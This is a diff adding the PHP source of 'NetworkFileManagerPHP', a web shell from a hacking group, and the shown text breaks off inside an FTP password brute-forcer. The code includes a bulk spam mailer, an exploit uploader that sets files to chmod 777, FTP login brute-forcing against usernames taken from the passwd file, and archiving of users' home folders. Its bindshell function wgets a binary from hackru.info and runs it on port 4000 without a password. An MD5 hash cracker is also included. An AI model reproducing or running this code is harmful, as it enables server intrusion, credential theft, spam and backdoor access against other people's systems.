+ <tr><td align=center bgcolor=#FFFFCC>Begining read from file <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+
+#if ($file) {
+#	$content = fread(fopen($file,"r"),filesize($file));
+#		$content = chunk_split(base64_encode($content));
+#		$name = basename($file);
+#   } else {
+#   $content ='';
+#   }
+      $boundary = uniqid("NextPart_");
+
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	#  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Sending mail to <b>\"".$recipient."\"</b>...sent ";
+
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>email is wrong, message was NOT sent !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+              echo "";
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Sending test message to <b>\"".$otvet."\"</b> to check out";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " message was sent... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>message was not sent...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>email is wrong.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>File <b>\"".$address."\"</b> was closed successfully!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Unable to close  <b>\"".$address."\"</b> file!<br></td></tr> </table>";    }
+  } else {
+    echo "unable to read file  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Status: ".$counter." messages were sent.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>";
+
+}
+}
+
+
+# help
+
+function help() {
+
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>help for scriptNetworkFileManagerPHP</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><b>NetworkFileManagerPHP</b> - script to access your host in a best way</font><br><br>
+
+There were added some commands to NFM, from scripts kind of itself. They are:<br>
+
+- Using aliases (<b>Rush</b>)<br>
+
+- FTP bruteforce (<b>TerraByte<b/>)<br>
+
+- Translated to english by (<b>revers<b/>)<br>
+
+- Added some sysinfo commands by (<b>revers<b/>)<br>
+
+- All the rest code belongs to me (<b>xoce<b/>)<br>
+
+- Thanks for testing goes to all #hack.ru channel<br><br>
+
+<b>Warning, we wanted to show by this script, that admins have to protect their system better, then they do now. Jokes with apache config are not good... Pay more attention to configuration of your system.</b><br><br>
+
+<b>How can you find us:</b><br>
+
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+
+See you round at network!!!<br></td></tr></table><br>";
+
+}
+
+
+
+
+
+function exploits($dir) {
+
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+
+if (!isset($status)) upload_exploits();
+
+
+
+else
+
+{
+
+
+
+$data = implode("", file($file3));
+
+$fp = @fopen($file2, "wb");
+
+fputs($fp, $data);
+
+$ok = fclose($fp);
+
+if($ok)
+
+{
+
+$size = filesize($file2)/1024;
+
+$sizef = sprintf("%.2f", $size);
+
+print "".exec("chmod 777 $public[1]")."";
+
+print "".exec("chmod 777 $public[2]")."";
+
+print "".exec("chmod 777 $public[3]")."";
+
+print "".exec("chmod 777 $private[1]")."";
+
+print "".exec("chmod 777 $private[2]")."";
+
+print "".exec("chmod 777 $private[3]")."";
+
+print "".exec("chmod 777 $private[4]")."";
+
+print "".exec("chmod 777 $private[5]")."";
+
+print "".exec("chmod 777 $private[6]")."";
+
+print "".exec("chmod 777 $private[7]")."";
+
+print "".exec("chmod 777 $private[8]")."";
+
+
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>You have uploaded: <b>file with size</b> (".$sizef."kb) </font></center></td></tr></table>";
+
+}
+
+else
+
+{
+
+print "Some errors occured.";
+
+}
+
+}
+
+}
+
+
+
+
+
+# FTP-bruteforce
+
+function ftp() {
+
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+
+ ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP server: <b>$ftp_server</b></td></tr>";
+
+
+
+ $fpip = @fopen ($filename, "r");
+
+ if ($fpip) {
+
+  while (!feof ($fpip)) {
+
+   $buf = fgets($fpip, 100);
+
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+   $conn_id=ftp_connect($ftp_server);
+
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+
+
+
+   $f=@fopen($HTTP_HOST,"a+");
+
+   fputs($f,"$g[1]:$g[1]\n");
+
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+
+
+
+   ftp_close($conn_id);
+
+   fclose($f);
+
+   } else {
+
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+function tar() {
+
+ global $action, $filename;
+
+ set_time_limit(0);
+
+ echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data compression</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>According to the different settings of servers, I didn't make default config of NFM. You're to write full path to the domain's folder and then press enter, so all data, containing in this folder will be compressed to tar.gz.<br><br>
+
+<b>Warning!</b><br>File <b>passwd</b> can have big size, so opening all users of this host can waste much time.<br><br>
+
+<b>It's highly recommended!</b><br>Open current function in another window of browser, to compress information, which you're interested in, during your host exploring.</blockquote></td></tr>
+
+</table><br>";
+
+
+
+$http_public="/public_html/";
+
+$fpip = @fopen ($filename, "r");
+
+if ($fpip) {
+
+ while (!feof ($fpip)) {
+
+  $buf = fgets($fpip, 100);
+
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+
+  $name=$g[1];
+
+  echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<form method='get' action='$PHP_SELF' >
+
+<tr><td align=center colspan=2 class=pagetitle><b>Compression <u>$name.tar.gz</u>:</b></td></tr>
+
+<tr>
+
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+
+<td valign=top><input type=submit value='GO' class=button1 $style_button></td>
+
+</tr></form></table>";
+
+  }
+
+ }
+
+}
+
+
+
+# bindshell
+
+function bash() {
+
+ global $action, $port_bind, $pass_key;
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Binding shell</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br>Current shell binds 4000 port, you may access to it by telneting to host:4000 port without password.</td></tr>
+
+</table><br>";
+
+
+
+echo "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b> Bindshell binary is situated in file called<u><i>s</i></u></b></td></tr>";
+
+
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://hackru.info/adm/exploits/bash/s")."</b> Downloading...</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> now chmod to 777</td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> now running to 4000 port</td></tr>";
+
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm -f s")."</b> Removing file<u>s</u> now...</td></tr>";
+
+echo"</table>";
+
+
+
+ }
+
+
+
+function crypte() {
+
+ global $action,$md5a,$sha1a,$crc32, $key,$string;
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data crypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>Now there are many different programs and scripts, which uses a lot of passwords crypt methods (Do you remember what a phpBB is?=)), so with NFM you can crypt some strings to hashes, because sometimes you may need to change somebodyes data with your one =). Also you may change your pass to NFM here.</blockquote></td></tr>
+
+</table>";
+
+
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Here are some useful cryption methods, which uses MHASH lib:</b></td></tr>
+
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>MD5 </b>(Very popular and fast method)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".md5($md5a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$md5a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox'type='text' name='md5a' size='50' value='' id='md5a'></td>
+
+ <td align=center width=100><input type='submit' value='Crypt MD5' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+
+ &nbsp;&nbsp;<b>SHA1 </b>(SHA1 - method to crypt with open key, It's very usefull too)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".sha1($sha1a)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$sha1a."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='sha1a' size='50' value='' id='sha1a'>
+
+ </td><td align=center width=100><input type='submit' value='Crypt SHA1' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=crypte' method=post>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>CRC32 </b>(Most used when making CRC check of data, but you can find a host with forum, with passwords, crypted by CRC32)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400>&nbsp;Result:&nbsp;&nbsp;<font color=#ffffcc><b>".crc32($crc32)."</b></font></td>
+
+ <td class=pagetitle width=100>&nbsp;Input:&nbsp;<font color=red><b>".$crc32."</b></font></td></tr>
+
+ <tr><td align=center width=400><input class='inputbox' type='text' name='crc32' size='50' value='' id='crc32'></td><td width=100 align=center><input type='submit' value='Crypt CRC32' class=button1 $style_button></td></tr>
+
+
+
+ </form></table>";
+
+
+
+ }
+
+
+
+function decrypte() {
+
+ global $action,$pass_de,$chars_de,$dat,$date;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>Data decrypter</b></font></b></td></tr>
+
+<tr><td bgcolor=#FFFFCC><br><blockquote>It's known all over the world, that MD5 crypt algorithm has no way to decrypt it, because it uses hashes. The one and only one way to try read what the hash is - to generate some hashes and then to compare them with source hash needed to be decrypted ... So this is bruteforce.</blockquote></td></tr>
+
+</table>";
+
+
+
+if($chars_de==""){$chars_de="";}
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=decrypte' method=post name=hackru><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Data decrypter:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>Decrypt MD5</b>(decryption time depends on the length or crypted word, may take a long time)</td></tr>
+
+ <tr>
+
+ <td class=pagetitle width=400 >&nbsp;MD5 hash:&nbsp;&nbsp;<font color=#ffffcc><b>".$pass_de."</b></font></td><td width=100 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=reset value=Clear class=button1 $style_button></td>
+
+  <tr><td align=left width=400 >&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+
+  <td class=pagetitle width=120 valign=top><b>Symvols for bruteforce:</b><br><font color=red><b><u>ENG:</u></b></font>
+
+   <a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a>
+
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:?.,&quot;')>[Symvols]</a><br><br>
+
+<font color=red><b><u>RUS:</u></b></font>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+<a class=menu href=javascript:ins('?????????????????????????????????')>[?-?]</a>
+
+</td></tr>
+
+<tr><td align=center width=400>
+
+<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''></td><td width=100 align=center><input type='submit' value='Decrypt MD5' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+if($_POST[pass_de]){
+
+$pass_de=htmlspecialchars($pass_de);
+
+$pass_de=stripslashes($pass_de);
+
+$dat=date("H:i:s");
+
+$date=date("d:m:Y");
+
+
+
+crack_md5();
+
+}
+
+}
+
+
+
+function crack_md5() {
+
+global $chars_de;
+
+$chars=$_POST[chars];
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+$chars_de=str_replace("<",chr(60),$chars_de);
+
+$chars_de=str_replace(">",chr(62),$chars_de);
+
+$c=strlen($chars_de);
+
+for ($next = 0; $next <= 31; $next++) {
+
+for ($i1 = 0; $i1 <= $c; $i1++) {
+
+$word[1] = $chars_de{$i1};
+
+for ($i2 = 0; $i2 <= $c; $i2++) {
+
+$word[2] = $chars_de{$i2};
+
+if ($next <= 2) {
+
+result(implode($word));
+
+}else {
+
+for ($i3 = 0; $i3 <= $c; $i3++) {
+
+$word[3] = $chars_de{$i3};
+
+if ($next <= 3) {
+
+result(implode($word));
+
+}else {
+
+for ($i4 = 0; $i4 <= $c; $i4++) {
+
+$word[4] = $chars_de{$i4};
+
+if ($next <= 4) {
+
+result(implode($word));
+
+}else {
+
+for ($i5 = 0; $i5 <= $c; $i5++) {
+
+$word[5] = $chars_de{$i5};
+
+if ($next <= 5) {
+
+result(implode($word));
+
+}else {
+
+for ($i6 = 0; $i6 <= $c; $i6++) {
+
+$word[6] = $chars_de{$i6};
+
+if ($next <= 6) {
+
+result(implode($word));
+
+}else {
+
+for ($i7 = 0; $i7 <= $c; $i7++) {
+
+$word[7] = $chars_de{$i7};
+
+if ($next <= 7) {
+
+result(implode($word));
+
+}else {
+
+for ($i8 = 0; $i8 <= $c; $i8++) {
+
+$word[8] = $chars_de{$i8};
+
+if ($next <= 8) {
+
+result(implode($word));
+
+}else {
+
+for ($i9 = 0; $i9 <= $c; $i9++) {
+
+$word[9] = $chars_de{$i9};
+
+if ($next <= 9) {
+
+result(implode($word));
+
+}else {
+
+for ($i10 = 0; $i10 <= $c; $i10++) {
+
+$word[10] = $chars_de{$i10};
+
+if ($next <= 10) {
+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
